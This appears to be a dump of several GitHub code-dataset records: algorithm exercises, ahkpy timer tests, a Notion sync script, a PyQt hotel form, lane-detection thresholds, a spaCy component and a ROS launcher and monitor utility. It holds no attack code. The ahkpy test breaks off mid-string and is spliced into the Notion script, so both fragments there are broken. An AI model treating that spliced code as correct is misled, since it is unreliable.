collections.deque()\n\n # 고슴도치, 물 시작 노드 생성\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 'S':\n s_queue_1.append(Node(i, j, 0))\n if matrix[i][j] == '*':\n w_queue_1.append(Node(i, j))\n\n # 고슴도치가 이동 불가능할 때 까지\n while s_queue_1:\n # 물처리 (현재 턴에 이동할 수 있는 물의 위치를 모두 이동하도록 해야함)\n while w_queue_1:\n w_cur = w_queue_1.popleft()\n for k in range(4):\n nx = w_cur.x + dx[k]\n ny = w_cur.y + dy[k]\n\n # nx, ny 가 matrix 범위 안인 경우\n if nx >= 0 and ny >= 0 and nx < len(matrix) and ny < len(matrix[0]):\n # '.', 'S' 인 경우에만 물이 번지므로 이미 방문한 것인지 굳이 확인 안해도됨\n if (matrix[nx][ny] == '.' or matrix[nx][ny] == 'S') and matrix[nx][ny] != 'X' and matrix[nx][\n ny] != 'D':\n w_queue_2.append(Node(nx, ny))\n matrix[nx][ny] = '*'\n\n w_queue_1 = w_queue_2\n w_queue_2 = collections.deque()\n\n # 고슴도치 이동처리\n while s_queue_1:\n s_cur = s_queue_1.popleft()\n for g in range(4):\n nx = s_cur.x + dx[g]\n ny = s_cur.y + dy[g]\n\n # nx, ny 가 matrxi 범위 안인 경우\n if nx >= 0 and ny >= 0 and nx < len(matrix) and ny < len(matrix[0]):\n # 도착 처리\n if matrix[nx][ny] == 'D':\n print(s_cur.count + 1)\n return\n\n # 방문처리 및 고슴도치 이동\n if matrix[nx][ny] == '.' and matrix[nx][ny] != 'X' and visit[nx][ny] == -1:\n s_queue_2.append(Node(nx, ny, s_cur.count + 1))\n matrix[nx][ny] = 'S' # 이동 위치를 눈으로 보기위해 일부러 추가한 코드\n visit[nx][ny] = 1\n\n s_queue_1 = s_queue_2\n s_queue_2 = collections.deque()\n\n # 도착 불가능\n print(\"KAKTUS\")\n\n\nR, C = list(map(int, sys.stdin.readline().rstrip().split(\" \")))\nmatrix = []\nfor i in range(R):\n matrix.append(list(sys.stdin.readline().rstrip()))\nescape(matrix)","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/DFS_BFS/hedgehog_escape.py","file_name":"hedgehog_escape.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"42565547160","text":"import sys\n\nimport pytest\n\nimport ahkpy as ahk\n\n\ndef test_validation():\n t = ahk.Timer(func=None)\n with pytest.raises(TypeError, match=\"must not be None\"):\n t.update()\n\n\ndef test_refcounts(request):\n func = lambda: None # noqa: E731\n timer = ahk.set_countdown(1, func)\n request.addfinalizer(timer.stop)\n func_refcount = sys.getrefcount(func)\n timer.stop()\n assert sys.getrefcount(func) == func_refcount - 1\n\n timer = ahk.set_countdown(0.01, func)\n func_refcount = sys.getrefcount(func)\n ahk.sleep(0.02)\n assert sys.getrefcount(func) == func_refcount - 1\n\n\ndef test_timer(child_ahk):\n def code():\n import ahkpy as ahk\n import sys\n\n ahk.hotkey(\"F24\", lambda: None) # Make the script persistent\n\n @ahk.set_countdown(0.1)\n def dong():\n print(\"Dong!\")\n sys.exit()\n\n print(\"Ding!\")\n\n res = child_ahk.run_code(code)\n assert res.stderr == \"\"\n assert res.stdout == \"Ding!\\nDong!\\n\"\n assert res.returncode == 0\n\n\ndef test_timer_stop(child_ahk):\n def code():\n import ahkpy as ahk\n import sys\n\n ahk.hotkey(\"F24\", lambda: None) # Make the script persistent\n\n @ahk.set_timer(0.1)\n def ding():\n print(\"Ding!\")\n ding.stop()\n\n @ahk.set_countdown(0.5)\n def exit():\n sys.exit()\n\n res = child_ahk.run_code(code)\n assert res.stderr == \"\"\n assert res.stdout == \"Ding!\\n\"\n assert res.returncode == 0\n\n\ndef test_timer_update(request):\n times = []\n\n timer = ahk.set_timer(1, times.append, 1)\n request.addfinalizer(timer.stop)\n\n timer.update(interval=0.1)\n ahk.sleep(0.59)\n timer.stop()\n assert len(times) == 5\n\n times.clear()\n assert timer.interval == 0.1\n timer.start()\n ahk.sleep(0.06)\n timer.update(priority=40) # Updating priority should not restart the timer\n ahk.sleep(0.06)\n assert len(times) == 1\n\n\ndef test_countdown_start(request):\n times = []\n\n timer = ahk.set_countdown(1, times.append, 1)\n request.addfinalizer(timer.stop)\n\n timer.start(interval=0.1) # Restart a non-finished countdown\n ahk.sleep(0.11)\n assert len(times) == 1\n\n timer.start() # Start a finished countdown with its previous interval\n ahk.sleep(0.11)\n assert len(times) == 2\n\n\ndef test_change_periodic(request):\n times = []\n\n timer = ahk.set_timer(0.1, times.append, 1)\n request.addfinalizer(timer.stop)\n\n ahk.sleep(0.29)\n assert len(times) == 2\n\n times.clear()\n timer.update(periodic=False)\n ahk.sleep(0.29)\n assert len(times) == 1\n\n\ndef test_timer_returns(child_ahk):\n def timers():\n import ahkpy as ahk\n import sys\n ahk.hotkey(\"F24\", sys.exit)\n ahk.set_countdown(0.01, object)\n print(\"ok00\")\n\n child_ahk.popen_code(timers)\n child_ahk.wait(0)\n\n assert not ahk.windows.wait(\n title=\"Python.ahk\",\n text=\"Error: cannot convert ' last_run:\n print(\"found notes to update\")\n new_notes.append(path)\n\n\n notion_client = NotionNotes(token_v2,notes_collection_url, tags_colleciton_url)\n for path in new_notes:\n notion_client.add_note(Note(path))\n\n\n pickle.dump(time(), open(\"last_run.p\", \"wb\"))\n\ndef sync_to_notion(files):\n notion_client = NotionNotes(token_v2,notes_collection_url, tags_colleciton_url)\n for file in files:\n print(f'File: {file[0]}, Content: {file[1]}')\n try:\n print(f'adding note {file[0]}')\n notion_client.add_note(Note(path=file[0],file_buff=file[1] ))\n except TypeError:\n print(file[0] + ' of invalid type')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ser-ge/tagger","sub_path":"cli_prototype/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20595679538","text":"import sql_connect\nfrom PyQt5.QtWidgets import QMainWindow\nfrom delete_reservation_ui import Ui_delete_reservation\n\nclass delete_reserve(QMainWindow, Ui_delete_reservation):\n def __init__(self, hide):\n super().__init__()\n\n if not hide:\n self.show()\n\n self.bookingid_notfound_label.hide()\n self.reservationdeleted_label.hide()\n\n self.__clicked()\n \n def __clicked(self):\n self.bookingsubmit.clicked.connect(lambda: self.__infosubmit())\n\n def __infosubmit(self):\n self.bookingid_notfound_label.hide()\n self.reservationdeleted_label.hide()\n \n booking_id_text = self.bookingid.text()\n\n sql_exec = 'SELECT* FROM reservation_list WHERE booking_id = %s'\n sql_arg = (booking_id_text)\n\n sql_connect.sql.cursor.execute(sql_exec, sql_arg)\n row = sql_connect.sql.cursor.fetchall()\n\n if len(row) == 0:\n self.bookingid_notfound_label.show()\n else:\n sql_exec = 'DELETE FROM reservation_list WHERE booking_id = %s'\n sql_connect.sql.cursor.execute(sql_exec, sql_arg)\n sql_connect.sql.connect.commit()\n self.reservationdeleted_label.show()\n\n def clear(self):\n self.bookingid.clear()\n self.bookingid_notfound_label.hide()\n self.reservationdeleted_label.hide()\n ","repo_name":"moho07/Hotel-Management-System-with-GUI","sub_path":"delete_reservation.py","file_name":"delete_reservation.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25109467436","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport glob\nfrom AdvLaneDet import CameraCalibration as CamCalib\nimport pickle\ndef abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):\n \n # Apply the following steps to img\n # 1) Convert to grayscale\n #gray = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n gray = img[:,:,0]\n # 2) Take the derivative in x or y given orient = 'x' or 'y'\n if orient == 'x':\n abs_sobel = np.absolute(cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel))\n if orient == 'y':\n abs_sobel = np.absolute(cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel))\n \n # 3) Take the absolute value of the derivative or gradient\n # 4) Scale to 8-bit (0 - 255) then convert to type = np.uint8\n scaled_sobel = np.uint8(255*abs_sobel/np.max(abs_sobel))\n # 5) Create a mask of 1's where the scaled gradient magnitude \n # is > thresh_min and < thresh_max\n binary_output = np.zeros_like(scaled_sobel)\n binary_output[(scaled_sobel >= thresh[0]) & (scaled_sobel <= thresh[1])]= 1\n # 6) Return this mask as your binary_output image\n \n return binary_output\n\n\ndef dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):\n \n # Apply the following steps to img\n # 1) Convert to grayscale\n gray = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n # 2) Take the gradient in x and y separately\n sobelx = np.absolute(cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel))\n sobely = np.absolute(cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel))\n # 3) Take the absolute value of the x and y gradients\n # 4) Use np.arctan2(abs_sobely, abs_sobelx) to calculate the direction of the gradient \n dir_grad = np.arctan2(sobely,sobelx)\n # 5) Create a binary mask where direction thresholds are met\n binary_output= np.zeros_like(gray)\n # 6) Return this mask as your binary_output image\n binary_output[(dir_grad >= thresh[0]) & (dir_grad <= thresh[1])] = 1\n \n return binary_output\n\n\ndef mag_threshold(img, sobel_kernel=3, mag_thresh=(0, 255)):\n \n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Take both Sobel x and y gradients\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # Calculate the gradient magnitude\n gradmag = np.sqrt(sobelx**2 + sobely**2)\n # Rescale to 8 bit\n scale_factor = np.max(gradmag)/255 \n gradmag = (gradmag/scale_factor).astype(np.uint8) \n # Create a binary image of ones where threshold is met, zeros otherwise\n binary_output = np.zeros_like(gradmag)\n binary_output[(gradmag >= mag_thresh[0]) & (gradmag <= mag_thresh[1])] = 1\n return binary_output\n\n\ndef region_of_interest(img, vertices):\n \"\"\"\n Applies an image mask.\n \n Only keeps the region of the image defined by the polygon\n formed from `vertices`. The rest of the image is set to black.\n \"\"\"\n #defining a blank mask to start with\n mask = np.zeros_like(img) \n \n #defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n \n #filling pixels inside the polygon defined by \"vertices\" with the fill color \n cv2.fillPoly(mask, vertices, ignore_mask_color)\n \n #returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\ndef hls_select(img, thresh=(0, 255)):\n # 1) Convert to HLS color space\n hls = cv2.cvtColor(img,cv2.COLOR_RGB2HLS)\n # 2) Apply a threshold to the S channel\n s_channel = hls[:,:,2]\n # 3) Return a binary image of threshold result\n binary_output = np.zeros_like(s_channel)\n binary_output[(s_channel > thresh[0]) & (s_channel <= thresh[1])] = 1\n return binary_output\n\n# Edit this function to create your own pipeline.\ndef pipeline(img, objpoints, imgpoints, ROI_vertices,ksize=3, grad_thresh=(170, 255), s_thresh=(20, 100), mag_thresh=(170,255), debug=False):\n \n #gradient binary\n gradx = abs_sobel_thresh(img, orient='x', sobel_kernel=ksize, thresh=grad_thresh)\n #saturation binary\n s_binary = hls_select(img, thresh=s_thresh)\n #direction/magnitude binary\n mag_binary = mag_threshold(img, sobel_kernel=ksize, mag_thresh=mag_thresh)\n dir_binary = dir_threshold(img, sobel_kernel=ksize, thresh=(np.pi/3, np.pi/2))\n \n combined = np.zeros_like(dir_binary)\n combined[((mag_binary == 1) & (dir_binary == 1)) | (gradx == 1) | (s_binary == 1)] = 1\n binary = region_of_interest(combined, ROI_vertices)\n\n if debug==True:\n #mask image\n mask_img = region_of_interest(img, ROI_vertices)\n plt.imshow(img)\n plt.title('origin')\n plt.show()\n plt.imshow(mask_img)\n plt.title('ROI mask image')\n plt.show()\n mag_dir_combined = np.zeros_like(dir_binary)\n mag_dir_combined[((mag_binary == 1) & (dir_binary == 1))] = 1\n plt.imshow(mag_dir_combined,cmap = 'gray')\n plt.title('mag and direction binary')\n plt.show()\n color_binary = np.dstack(( gradx, s_binary, mag_dir_combined)) * 255\n plt.imshow(color_binary)\n plt.title('Threshold image: gradx(R)/saturation(G)/direction(B)')\n plt.show()\n plt.imshow(binary,cmap ='gray')\n plt.title('Binary image')\n plt.show()\n\n return binary\n \n\n ","repo_name":"lesialin/CarND-Advanced-Lane-Line","sub_path":"AdvLaneDet/Threshold.py","file_name":"Threshold.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39407890751","text":"import spacy\nfrom spacy.language import Language\nfrom spacy.tokens.doc import Doc\n\n\n@Language.component(\"info_component\")\ndef my_component(doc: Doc) -> Doc:\n print(f\"After tokenization, this doc has {len(doc)} tokens.\")\n print(\"The part-of-speech tags are:\", [token.pos_ for token in doc])\n if len(doc) < 10:\n print(\"This is a pretty short document.\")\n return doc\n\n\nnlp = spacy.load(\"en_core_web_sm\")\nnlp.add_pipe(\"info_component\", name=\"print_info\", last=True)\nprint(nlp.pipe_names) # ['tagger', 'parser', 'ner', 'print_info']\ndoc = nlp(\"This is a sentence.\")","repo_name":"ails-lab/spacy-ails","sub_path":"src/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22098195354","text":"n=int(input())\nd=list(map(int,input().split()))\ns=set(d)\ns=list(s)\nc=[]\nfor i in s:\n c1=d.count(i)\n c.append(c1)\nf=[]\nwhile len(c)>0:\n m=max(c)\n i1=c.index(m)\n c.remove(m)\n f.append(s[i1])\n s.remove(s[i1])\nprint(*f)","repo_name":"Durgaprasad-2002/codemind-python","sub_path":"Sorting_Frequency.py","file_name":"Sorting_Frequency.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"fa","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2388592077","text":"# 19.1カラム目の出現頻度順\n\nimport collections\n\ntext = 'hightemp.txt'\n\nwith open(text) as f:\n col1s = [e.split('\\t')[0] for e in f.readlines()]\n\nc = collections.Counter(col1s)\n\nfor e in c.most_common():\n print(e[0])\n","repo_name":"annkara/NLP100","sub_path":"ch2/19.py","file_name":"19.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6888168615","text":"#!/usr/bin/python\n\"\"\"\nCommon ReFrESH Utilities\nAuthor: Haoguang Yang\n\"\"\"\n\nimport roslaunch\nimport rospy\nimport tf2_ros\nimport actionlib\nfrom actionlib.action_server import nop_cb\nfrom enum import Enum\nimport threading\nimport inspect\nimport ctypes\nimport psutil\nimport os\nimport netifaces as ni\nimport time\n\n\"\"\"\nRaise exception in a thread asynchronously.\n\"\"\"\ndef _async_raise(tid, exctype:type):\n \"\"\"raises the exception, performs cleanup if needed\"\"\"\n if not inspect.isclass(exctype):\n raise TypeError(\"Only types can be raised (not instances)\")\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), ctypes.py_object(exctype))\n if res == 0:\n raise ValueError(\"invalid thread id:\"+str(tid))\n elif res != 1:\n \"\"\"if it returns a number greater than one, you're in trouble,\n and you should call it again with exc=NULL to revert the effect\"\"\"\n ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)\n raise SystemError(\"PyThreadState_SetAsyncExc failed\")\n\n\"\"\"\nThread class with stoppable exception.\n\"\"\"\nclass Thread(threading.Thread):\n def _get_my_tid(self):\n \"\"\"determines this (self's) thread id\"\"\"\n if not self.is_alive():\n # it may have shut down during this process.\n raise threading.ThreadError(\"the thread is not active\")\n\n # do we have it cached?\n if hasattr(self, \"_thread_id\"):\n return self._thread_id\n\n # no, look for it in the _active dict\n for tid, tobj in threading._active.items():\n if tobj is self:\n self._thread_id = tid\n return tid\n\n raise AssertionError(\"could not determine the thread's id\")\n\n def raise_exc(self, exctype:type):\n \"\"\"raises the given exception type in the context of this thread\"\"\"\n _async_raise(self._get_my_tid(), exctype)\n\n def stop(self):\n \"\"\"raises SystemExit in the context of the given thread, which should\n cause the thread to exit silently (unless caught)\"\"\"\n try:\n self.raise_exc(SystemExit)\n except (ValueError, threading.ThreadError) as e:\n print(\"WARNING: Thread.stop failed with\", e, \". The thread may have died previously.\")\n finally:\n self.join(10.0)\n\nclass DictObj:\n def __init__(self, in_dict:dict):\n assert isinstance(in_dict, dict)\n for key, val in in_dict.items():\n if isinstance(val, (list, tuple)):\n setattr(self, key, [DictObj(x) if isinstance(x, dict) else x for x in val])\n else:\n setattr(self, key, DictObj(val) if isinstance(val, dict) else val)\n\n\"\"\"Class that implements a ring buffer\"\"\"\nclass RingBuffer:\n \"\"\" class that implements a not-yet-full buffer \"\"\"\n def __init__(self,size_max:int):\n self.max = abs(size_max)\n self.data = []\n\n class __Full:\n \"\"\" class that implements a full buffer \"\"\"\n def append(self, x):\n \"\"\" Append an element overwriting the oldest one. \"\"\"\n self.data[self.cur] = x\n self.cur = (self.cur+1) % self.max\n def get(self):\n \"\"\" return list of elements in correct order \"\"\"\n return self.data[self.cur:]+self.data[:self.cur]\n def clear(self):\n \"\"\" Clear and reset the buffer to not full \"\"\"\n self.data.clear()\n self.__class__ = RingBuffer\n\n def append(self,x):\n \"\"\"append an element at the end of the buffer\"\"\"\n self.data.append(x)\n if len(self.data) == self.max:\n self.cur = 0\n # Permanently change self's class from non-full to full\n self.__class__ = self.__Full\n\n def get(self):\n \"\"\" Return a list of elements from the oldest to the newest. \"\"\"\n return self.data\n\n def clear(self):\n \"\"\" Clear and reset the buffer \"\"\"\n self.data.clear()\n\n\"\"\"\nClass that monitors CPU and memory utilization of ROS nodes that runs separately with the manager.\nSupports nodes launched with launch file or with rosrun, within the Launcher class.\n\"\"\"\nclass ROSnodeMonitor:\n def __init__(self):\n self.monitors = []\n self.alive = False\n self.attached = False\n\n def attach(self, handles):\n try:\n for proc in handles:\n if hasattr(proc, '__iter__'):\n for p in proc:\n if not isinstance(p, roslaunch.Process):\n print(\"ERROR: Handle\", p, \"within\", proc, \"is not supported.\")\n continue\n self.monitors.append([psutil.Process(p.get_info()['pid'])])\n elif isinstance(proc, roslaunch.Process):\n self.monitors.append([psutil.Process(proc.get_info()['pid'])])\n else:\n print(\"WARNING: Handle\", proc, \\\n \"is not of type Ftype.LAUNCH_FILE or Ftype.NODE. This thread is not supported.\")\n self.monitors.append([])\n self.attached = True\n for th in self.monitors:\n for this in th:\n # initialize CPU counter\n _ = this.cpu_percent()\n self.alive = True\n except psutil.NoSuchProcess:\n self.monitors.clear()\n\n def getCpuMemUtil(self):\n cpuUtil = 0.\n memUtil = 0.\n try:\n for th in self.monitors:\n for this in th:\n cpuUtil += this.cpu_percent()*0.01\n memUtil += this.memory_percent()*0.01\n cpuUtil /= psutil.cpu_count()\n except psutil.NoSuchProcess:\n self.monitors.clear()\n self.alive = False\n #print(cpuUtil, memUtil)\n return cpuUtil, memUtil\n\n def detach(self):\n self.monitors.clear()\n self.alive = False\n self.attached = False\n\n def isAttached(self):\n return self.attached\n \n def isAlive(self):\n return self.alive\n\n\"\"\"Monitors a list of topics for dependent publishers / TF transforms.\"\"\"\nclass ROSTopicMonitor:\n def __init__(self, subs:list=[], pubs:list=[], tf:list=[]):\n self.attached = False\n self.subs = []\n for item in subs:\n if type(item)==rospy.Subscriber:\n self.subs.append(item)\n continue\n try:\n # create a dummy subscriber for dependent pub checking\n self.subs.append(rospy.Subscriber(item[0], item[1]))\n except Exception as e:\n print(\"ERROR: When creating Topic Monitor --\", e)\n self.pubs = []\n for item in pubs:\n # no additional dummy publishers, since it will pollute downstream subscribers\n if type(item)!=rospy.Publisher:\n print(\"ERROR: When creating Topic Monitor -- Publisher list only allows existing rospy.Publisher instances\")\n continue\n self.pubs.append(item)\n self.tf = []\n self.tfBuffer:tf2_ros.Buffer = None\n if len(tf):\n for item in tf:\n if len(item)!=2:\n print(\"ERROR: When creating TF Monitor -- Frames not in pairs\")\n continue\n self.tf.append(lambda : self.tfBuffer.can_transform(item[0], item[1], rospy.Time(0)))\n \n def attach(self, module):\n self.tfBuffer = module.managerHandle.launcher.tfBuffer\n self.attached = True\n #TODO: reuse subscriber and publisher handles from module?\n\n def isAttached(self):\n return self.attached\n\n def subsHaveSources(self)->list:\n nPub = [item.get_num_connections() for item in self.subs]\n return nPub\n \n def pubsListened(self)->list:\n nSub = [item.get_num_connections() for item in self.pubs]\n return nSub\n\n def tfFeasible(self)->list:\n if self.tfBuffer:\n doable = [item() for item in self.tf]\n else:\n doable = [False for item in self.tf]\n return doable\n\n\"\"\"Monitors network traffic flow of a wireless interface. Implementation based on iwconfig shell command\"\"\"\nclass WirelessNetworkMonitor:\n def __init__(self, hint:str='wl', interval:float=1.0):\n ifaces = ni.interfaces()\n self.wlan_name = ''\n for item in ifaces:\n if hint in item:\n self.wlan_name = item\n break\n if not self.wlan_name:\n raise RuntimeError(\"No WiFi interface is found under the given hint\", hint, \".\")\n self.dt = interval\n self.lastUpdate = 0\n self.maxBandwidth = 0.1\n\n def getInterfaceSpeed(self):\n currentTime = time.time()\n if currentTime - self.lastUpdate > self.dt:\n termOut = os.popen('iwconfig '+self.wlan_name+\\\n ' | grep \"Mb/s\" | sed \"s/.*Bit Rate=\\\\([^ ]*\\\\) Mb.*/\\\\1/\"').read()[:-1]\n if termOut:\n # convert to Bytes per second\n self.maxBandwidth = float(termOut)*131072\n else:\n # return a small value to prevent singularity\n self.maxBandwidth = 0.1\n self.lastUpdate = currentTime\n\n def bwUtil(self, bytesRecvd:int, dt:float):\n self.getInterfaceSpeed()\n return bytesRecvd/dt/self.maxBandwidth\n\n\"\"\"\nThread Function Type enumeratorself.roscoreProc.pm.is_shutdown\n\"\"\"\nclass Ftype(Enum):\n NODE = 0\n LAUNCH_FILE = 1\n THREAD = 2\n TIMER = 3\n SUBSCRIBER = 4\n SERVICE = 5\n ACTION_SRV = 6\n ACTION_CLI = 7\n CALLABLE = 8\n\n\"\"\"\nThread Function Status enumerator\n\"\"\"\nclass Fstat(Enum):\n RUNNING = 0 # On and actively running\n READY = 1 # On and standing by\n BLOCKED = 2 # Preempted\n OFF = 3 # Turned Off\n NULL = 4 # Not registered\n ERROR = 5 # Aborted\n\n\"\"\"\nWrapper for launching threads and ROS components within Python\n\"\"\"\nclass Launcher:\n def __init__(self, launcherName:str, auto_start=True):\n self.roscoreProc = None\n self.nodeLauncher = None\n self.name = launcherName\n self.uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\n roslaunch.configure_logging(self.uuid)\n self.roscoreProc = roslaunch.parent.ROSLaunchParent(self.uuid, roslaunch_files=[], \\\n is_core=True)\n self.nodeLauncher = roslaunch.parent.ROSLaunchParent(self.uuid, roslaunch_files=[], \\\n is_core=False)\n self.tfBuffer = None\n if auto_start:\n self.activate()\n\n def activate(self):\n self.roscoreProc.start()\n self.roscoreProc.spin_once()\n self.nodeLauncher.start(auto_terminate=False)\n self.spin_once()\n rospy.init_node(self.name)\n self.spin_once()\n rospy.sleep(0.05)\n self.tfBuffer = tf2_ros.Buffer()\n self.spin_once()\n rospy.sleep(0.05)\n self.tfListener = tf2_ros.TransformListener(self.tfBuffer)\n self.spin_once()\n rospy.sleep(0.05)\n\n def launch(self, ftype:Ftype, *args, **kwargs):\n if ftype == Ftype.NODE:\n return self.nodeLaunch(*args, **kwargs)\n elif ftype == Ftype.LAUNCH_FILE:\n return self.fileLaunch(*args, **kwargs)\n elif ftype == Ftype.THREAD:\n return self.threadLaunch(*args, **kwargs)\n elif ftype == Ftype.TIMER:\n return self.timerLaunch(*args, **kwargs)\n elif ftype == Ftype.SUBSCRIBER:\n return self.subscriberLaunch(*args, **kwargs)\n elif ftype == Ftype.SERVICE:\n return self.serviceLaunch(*args, **kwargs)\n elif ftype == Ftype.ACTION_SRV:\n return self.actionSrvLaunch(*args, **kwargs)\n elif ftype == Ftype.ACTION_CLI:\n return self.actionCliLaunch(*args, **kwargs)\n elif ftype == Ftype.CALLABLE:\n return args[0]\n else:\n print(\"ERROR: type not implemented.\")\n\n def nodeLaunch(self, pkgName:str, execName:callable, name:str=None, namespace:str='/', args:str='', \n respawn:bool=False, respawn_delay:float=0.0, remap_args=None, env_args=None, output=None,\n launch_prefix=None):\n nodeProc, success = self.nodeLauncher.runner.launch_node(roslaunch.core.Node(\\\n pkgName, execName, name=name, namespace=namespace, args=args, respawn=respawn, \\\n respawn_delay=respawn_delay, remap_args=remap_args, env_args=env_args, \\\n output=output, launch_prefix=launch_prefix))\n if success:\n return nodeProc\n else:\n return None\n\n def fileLaunch(self, pkgName:str='', fileName:str='', args:tuple=(), fullPathList:list=[]):\n if not len(fullPathList):\n fp = roslaunch.rlutil.resolve_launch_arguments([pkgName, fileName, *args])\n if args:\n fp = [(fp[0], list(args))]\n else:\n fp = []\n for line in fullPathList:\n if len(line)>1:\n fp.append((roslaunch.rlutil.resolve_launch_arguments(line)[0], line[1:]))\n else:\n fp.append(roslaunch.rlutil.resolve_launch_arguments(line)[0])\n # wait until roscore is available to handle the state transition.\n roslaunch.rlutil.get_or_generate_uuid(None, True)\n cfg = roslaunch.config.load_config_default(fp, None, verbose=False)\n self.nodeLauncher.runner.config.params.update(cfg.params)\n # hack to update parameter server...\n self.nodeLauncher.runner._load_parameters()\n nodeProcs = []\n # only launches local nodes.\n local_nodes = [n for n in cfg.nodes if roslaunch.core.is_machine_local(n.machine)]\n for node in local_nodes:\n self.nodeLauncher.spin_once()\n self.roscoreProc.spin_once()\n proc, success = self.nodeLauncher.runner.launch_node(node)\n if success:\n nodeProcs.append(proc)\n self.nodeLauncher.spin_once()\n self.roscoreProc.spin_once()\n return tuple(nodeProcs)\n\n def threadLaunch(self, funcPtr:callable=None, args:tuple=()):\n t = Thread(target=funcPtr, args=args)\n t.start()\n return t\n\n def timerLaunch(self, freq:float, cb:callable):\n if freq>0.:\n timer = rospy.Timer(rospy.Duration(1./freq), cb)\n return timer\n else:\n print(\"ERROR: Initializing a timer callback with non-positive frequency.\")\n\n def subscriberLaunch(self, topic:str, msgType:type, cb:callable, args=None):\n subs = rospy.Subscriber(topic, msgType, cb, args)\n return subs\n\n def serviceLaunch(self, topic:str, srvType:type, cb:callable):\n srv = rospy.Service(topic, srvType, cb)\n return srv\n\n def actionSrvLaunch(self, topic:str, actType:type, cb:callable, preempt_cb=None):\n actServer = actionlib.SimpleActionServer(topic, actType, cb, auto_start = False)\n if not (preempt_cb is None):\n actServer.register_preempt_callback(preempt_cb)\n # modify the action server structure to suit our wrapper\n def stop():\n actServer.set_preempted()\n actServer.action_server.stop()\n setattr(actServer, 'stop', stop)\n actServer.start()\n return actServer\n\n def actionCliLaunch(self, topic:str, actType:type, feedback_cb:callable,\n active_cb:callable=nop_cb, done_cb:callable=nop_cb,\n goal=None, availTimeout:float=0):\n actClient = actionlib.SimpleActionClient(topic, actType)\n # modify the action client structure to suit our wrapper\n setattr(actClient, 'connected', actClient.wait_for_server(rospy.Duration(availTimeout)))\n # black magic...\n def stop():\n actClient.cancel_all_goals()\n actClient.action_client.stop()\n actClient.stop_tracking_goal()\n setattr(actClient, 'stop', stop)\n # helper function to submit a goal.\n setattr(actClient, 'submit', lambda goal : \\\n actClient.send_goal(goal, done_cb, active_cb, feedback_cb))\n # no goal specified, return an inactive client.\n if goal is None:\n return actClient\n # a goal has been specified. Start running the goal.\n if actClient.connected:\n actClient.submit(goal)\n return actClient\n\n def stop(self, proc):\n if hasattr(proc, '__iter__'):\n for p in proc:\n if callable(getattr(p, \"stop\", None)):\n p.stop()\n elif callable(getattr(p, \"shutdown\", None)):\n p.shutdown()\n elif callable(getattr(p, \"unregister\", None)):\n p.unregister()\n else:\n raise RuntimeError(\"Stopping method not implemented!\")\n else:\n if callable(proc):\n return # this is a function not a thread, does nothing\n elif callable(getattr(proc, \"stop\", None)):\n proc.stop()\n elif callable(getattr(proc, \"shutdown\", None)):\n proc.shutdown()\n elif callable(getattr(proc, \"unregister\", None)):\n proc.unregister()\n else:\n raise RuntimeError(\"Stopping method not implemented!\")\n\n def status(self):\n # returns status of the launcher\n coreStat = Fstat.NULL\n nodeStat = Fstat.NULL\n if hasattr(self.roscoreProc, 'runner'):\n if not (self.roscoreProc.runner is None):\n if not self.roscoreProc.pm.is_shutdown:\n coreStat = Fstat.RUNNING\n else:\n coreStat = Fstat.OFF\n if hasattr(self.nodeLauncher, 'runner'):\n if not (self.nodeLauncher.runner is None):\n if not self.nodeLauncher.pm.is_shutdown:\n nodeStat = Fstat.RUNNING\n else:\n nodeStat = Fstat.OFF\n return {'rosCore': coreStat, 'nodeLauncher': nodeStat}\n\n def spin(self):\n rate = rospy.Rate(20.0)\n while (not self.roscoreProc.pm.is_shutdown) or (not self.nodeLauncher.pm.is_shutdown):\n self.roscoreProc.spin_once()\n self.nodeLauncher.spin_once()\n rate.sleep()\n rospy.signal_shutdown(\"ROS Launcher Exiting...\")\n \n def spin_once(self):\n self.nodeLauncher.spin_once()\n self.roscoreProc.spin_once()\n \n def shutdown(self):\n self.nodeLauncher.shutdown()\n self.roscoreProc.shutdown()\n\nif __name__ == \"__main__\":\n 